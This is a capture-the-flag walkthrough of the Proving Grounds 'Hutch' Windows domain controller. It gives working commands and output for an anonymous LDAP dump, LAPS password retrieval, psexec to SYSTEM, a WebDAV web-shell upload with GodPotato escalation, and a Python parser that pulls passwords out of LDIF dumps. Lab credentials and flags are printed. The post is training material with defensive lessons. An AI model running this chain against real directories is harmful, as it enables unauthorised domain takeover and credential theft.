
Proving Grounds - Hutch (Windows)

Proving Grounds Hutch Windows walkthrough covering LDAP anonymous enumeration, LAPS password retrieval, and WebDAV shell upload with GodPotato.


Overview

| Field | Value |
|---|---|
| OS | Windows (Server 2019) |
| Difficulty | Not specified |
| Attack Surface | LDAP, IIS with WebDAV, Active Directory |
| Primary Entry Vector | LDAP anonymous dump -> cleartext password in description field |
| Privilege Escalation Path | LAPS ms-Mcs-AdmPwd retrieval -> psexec SYSTEM / WebDAV shell + GodPotato |

Credentials

```
fmcsorley       CrabSharkJellyfish192
administrator   jS+6#%Dk+00]00  (via LAPS)
```

Reconnaissance


💡 Why this works This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.

```bash
rustscan -a $ip -r 1-65535 --ulimit 5000
```

```
Open 192.168.198.122:53
Open 192.168.198.122:80
Open 192.168.198.122:88
Open 192.168.198.122:135
Open 192.168.198.122:139
Open 192.168.198.122:389
Open 192.168.198.122:445
Open 192.168.198.122:5985
Open 192.168.198.122:9389
```

Service and script detection on the open ports (note the WebDAV method list on port 80, which advertises PUT):

```
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec)
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
```

SMB anonymous login returned no shares. RPC was denied. However, LDAP anonymous bind with a full base DN dump returned all domain objects:

```bash
ldapsearch -x -H ldap://$ip -b "DC=hutch,DC=offsec" -s sub "(objectclass=*)" > ldap_dump.txt
grep -i pass ldap_dump.txt
```

```
description: Password set to CrabSharkJellyfish192 at user's request. Please change on next login.
```

The password was found in the description attribute of user fmcsorley (Freddy McSorley).

Initial Foothold


At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

With fmcsorley's credentials, an authenticated LDAP bind showed that this ordinary domain user could read the LAPS attribute ms-Mcs-AdmPwd on the domain controller's computer object, i.e. the managed Administrator password for that host. Because the host is itself the domain controller, that account is the domain's built-in Administrator, which is why the password works for a domain logon below:

```bash
ldapsearch -x -H ldap://$ip -D "fmcsorley@hutch.offsec" -w 'CrabSharkJellyfish192' \
  -b "DC=hutch,DC=offsec" "(objectclass=computer)" ms-Mcs-AdmPwd
```

This returned the local administrator password. Using psexec with the admin credentials:

```bash
impacket-psexec 'hutch.offsec/administrator:jS+6#%Dk+00]00@'$ip
```

```
[*] Requesting shares on 192.168.198.122.....
[*] Found writable share ADMIN$
[*] Opening SVCManager on 192.168.198.122.....
C:\Windows\system32> whoami
nt authority\system
```

```
c:\Users\fmcsorley\Desktop> type local.txt
1dc76d8ad78f9e8711b704ca742ce7db
```
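Both ldapsearch invocations above return LDIF, and a plain `grep -i pass` over the dump misses two things: values that ldapsearch base64-encodes (any value starting with a space or containing non-ASCII bytes is emitted as `attr:: base64`) and values wrapped across continuation lines. The following added example, which is not code from the post or from the Proving Grounds machine, parses such a dump offline and extracts both the password-bearing free-text attributes and any ms-Mcs-AdmPwd values that came back. SAMPLE_LDIF is constructed for the example: the fmcsorley description is the one quoted above, while the jdoe and ssmith users and the HUTCHDC distinguished name are assumptions.

```python
"""Offline triage of ldapsearch LDIF output (added example, not from the post).

Folds LDIF continuation lines, decodes base64 ("attr:: ...") values, then
reports free-text attributes that mention a password and LAPS passwords on
computer objects. SAMPLE_LDIF is constructed; the jdoe/ssmith users and the
HUTCHDC DN are assumptions made for the example.
"""
import base64
import re

# Free-text attributes that get misused for credentials. Attribute names are
# compared case-insensitively, as LDAP itself does.
FREE_TEXT_ATTRS = ("description", "info", "comment", "title")
PASSWORD_HINT = re.compile(r"\b(pass(word|wd)?|pwd|credential)\b", re.IGNORECASE)
LDIF_LINE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")

# ldapsearch base64-encodes a value that starts with a space, so a plain grep
# for "pass" would never see this description.
_B64_DESC = base64.b64encode(b" New hire: pwd is Welcome2024!").decode()

SAMPLE_LDIF = f"""\
# extended LDIF
#
# LDAPv3
# base <DC=hutch,DC=offsec> with scope subtree
#
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: user
sAMAccountName: fmcsorley
description: Password set to CrabSharkJellyfish192 at user's request. Please
  change on next login.

dn: CN=Jane Doe,CN=Users,DC=hutch,DC=offsec
objectClass: user
sAMAccountName: jdoe
description:: {_B64_DESC}

dn: CN=Sam Smith,CN=Users,DC=hutch,DC=offsec
objectClass: user
sAMAccountName: ssmith
description: Helpdesk technician

dn: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec
objectClass: computer
sAMAccountName: HUTCHDC$
ms-Mcs-AdmPwd: jS+6#%Dk+00]00

# search result
search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Return one {attr: [values]} dict per entry that carries a dn.

    Attribute names are lower-cased. The summary records ldapsearch appends
    ("search: 2", "result: 0 Success") have no dn and are dropped.
    """
    folded = []
    for line in text.splitlines():
        if line.startswith(" ") and folded:
            folded[-1] += line[1:]      # LDIF continuation line
        else:
            folded.append(line)

    entries, current = [], {}
    for line in folded:
        if not line.strip():            # a blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = LDIF_LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr.lower(), []).append(value)
    if current:
        entries.append(current)
    return [e for e in entries if "dn" in e]


def find_password_hints(entries):
    """(account, attribute, text) for free-text attributes that mention a password."""
    hits = []
    for e in entries:
        name = e.get("samaccountname", e["dn"])[0]
        for attr in FREE_TEXT_ATTRS:
            for value in e.get(attr, []):
                if PASSWORD_HINT.search(value):
                    hits.append((name, attr, value))
    return hits


def laps_passwords(entries):
    """(dn, ms-Mcs-AdmPwd) for every object on which the attribute was readable."""
    return [(e["dn"][0], e["ms-mcs-admpwd"][0])
            for e in entries if "ms-mcs-admpwd" in e]


if __name__ == "__main__":
    import sys
    # Usage: python ldif_triage.py ldap_dump.txt  (no argument: run on the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LDIF
    found = parse_ldif(text)
    print(f"{len(found)} entries")
    for name, attr, value in find_password_hints(found):
        print(f"[password hint] {name} {attr}: {value}")
    for dn, pwd in laps_passwords(found):
        print(f"[LAPS] {dn}: {pwd}")
```

Run it against the real `ldap_dump.txt` from the anonymous bind, and again against the output of the authenticated ms-Mcs-AdmPwd query; the same script serves a defender auditing their own directory for the two findings in this post.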

💡 Why this works The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.

Privilege Escalation


The psexec approach provided a direct SYSTEM shell. As an alternative path that does not depend on the LAPS misconfiguration, WebDAV on IIS accepted a PUT of an ASPX web shell when authenticated with fmcsorley's ordinary domain credentials:

```bash
curl -u 'hutch.offsec\fmcsorley:CrabSharkJellyfish192' \
  -X PUT http://192.168.198.122/shell.aspx --data-binary @shell.aspx -D -
```

```
HTTP/1.1 204 No Content
```

```bash
curl -sk "http://192.168.198.122/shell.aspx?cmd=whoami"
```

```
iis apppool\defaultapppool
```

The application pool identity holds SeImpersonatePrivilege, so GodPotato, staged beforehand in C:\Windows\Temp, was run through the web shell to escalate to SYSTEM. The command is URL-encoded in the query string (`+` for spaces, `%22` for double quotes):

```bash
curl -sk "http://192.168.198.122/shell.aspx?cmd=C:\Windows\Temp\GodPotato.exe+-cmd+%22cmd+/c+whoami%22"
```

```
nt authority\system
```

```
c:\Users\Administrator\Desktop> type proof.txt
b337a9db2cbe88a59254dcb9ef9c557e
```

💡 Why this works Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.

Lessons Learned / Key Takeaways

  • Never store passwords in LDAP description (or other free-text) fields. With anonymous bind allowed, anyone who can reach port 389 can dump every object, and such fields are the first place an attacker greps.
  • Read permission on the LAPS attribute ms-Mcs-AdmPwd should be tightly restricted; an ordinary domain user should never be able to read a managed local Administrator password, least of all a domain controller's.
  • WebDAV with PUT enabled on IIS lets any account that can authenticate (here an ordinary domain user) write files into the web root, which the application pool then executes. Disable WebDAV or restrict PUT, MKCOL and MOVE to the identities that need them.
  • IIS application pool identities hold SeImpersonatePrivilege by default, so code execution as the app pool is escalated to SYSTEM with a potato-family tool such as GodPotato.

Attack Flow



```mermaid
flowchart LR
    subgraph SCAN["🔍 Scan"]
        direction TB
        S1["Rustscan / Nmap\nPORT: 53/80/88/135/389\n445/5985/9389"]
        S2["HUTCHDC: hutch.offsec\nIIS 10.0 + WebDAV (PUT allowed)\nAD DC"]
        S3["SMB anonymous: no shares\nRPC: ACCESS_DENIED"]
        S4["LDAP anonymous bind\n14 users enumerated\ncleartext password in fmcsorley description"]
        S1 --> S2 --> S3 --> S4
    end

    subgraph INITIAL["💥 Initial Access"]
        direction TB
        I1["fmcsorley : CrabSharkJellyfish192\nauthenticated LDAP bind"]
        I2["ms-Mcs-AdmPwd (LAPS)\nadministrator password retrieved"]
        I3["impacket-psexec\nadministrator@HUTCHDC\nnt authority\\system"]
        I4["📄 local.txt + proof.txt"]
        I1 --> I2 --> I3 --> I4
    end

    subgraph ALT["🔄 Alternative path: WebDAV"]
        direction TB
        A1["curl PUT: shell.aspx\nWebDAV upload"]
        A2["IIS apppool\\defaultapppool\nweb shell execution"]
        A3["GodPotato.exe\nnt authority\\system"]
        A1 --> A2 --> A3
    end

    SCAN --> INITIAL
    SCAN --> ALT

    style SCAN fill:#e8eaf6
    style INITIAL fill:#c8e6c9
    style ALT fill:#fff9c4
    style I4 fill:#4caf50
    style A3 fill:#ff9800
```

References

  • LDAP Anonymous Bind: https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html
  • LAPS (ms-Mcs-AdmPwd): https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/laps.html
  • GodPotato: https://github.com/BeichenDream/GodPotato
  • Impacket psexec: https://github.com/fortra/impacket
  • RustScan: https://github.com/RustScan/RustScan
  • Nmap: https://nmap.org/
This post is licensed under CC BY 4.0 by the author.